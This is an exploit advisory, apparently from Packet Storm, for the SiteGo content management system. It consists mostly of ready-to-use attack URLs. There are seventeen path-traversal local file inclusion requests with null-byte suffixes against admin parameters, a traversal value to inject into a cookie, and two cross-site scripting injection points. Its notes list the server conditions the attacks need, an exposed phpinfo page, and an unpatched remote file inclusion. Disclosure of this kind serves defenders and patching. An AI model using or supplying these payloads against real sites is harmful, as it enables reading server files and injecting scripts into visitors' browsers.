SiteGo suffers from cross site scripting and local file inclusion vulnerabilities.
c99e07b9068b26af1eac0acf23ab7ecb21e147155ffa12778fcd6ca5436149a1#################################################
### Exploit Title: SiteGo Multiple Vulnerabilities
### Date: 02/07/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows
#################################################
# Multiple Local File Inclusion :
http://127.0.0.1/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/visitors/index.php?idv=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/stylemanager/index.php?ids=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/site_reports/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/my_tools/index.php?idt=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/my_account/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/mysql/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/moderators/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/mainlinks/index.php?idl=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/linksmanager/index.php?idl=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/ipdenymanager/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/filesmanager/index.php?idf=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/feedout/index.php?idf=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/contacts/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00
Also Inject The Cookies In Main Page By This :
style_name=../../../../../../../../../../windows/win.ini%00
# XSS :
http://127.0.0.1/site-go/?action=vote&Browse=[XSS]
http://127.0.0.1/site-go/?action=MailList&articles=&B1=ãÊÇÈÚÉ&delete=[XSS]&reason=1
Many Files is affect
#######################################################
# Notes :
1- Must be magic_quotes_gpc = Off
2- phpinfo() :
http://127.0.0.1/site-go/admin/include/phpinfo.php
3- Remote File Inclusion Doesn't Fix Yet ! :
http://www.exploit-db.com/exploits/21222/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed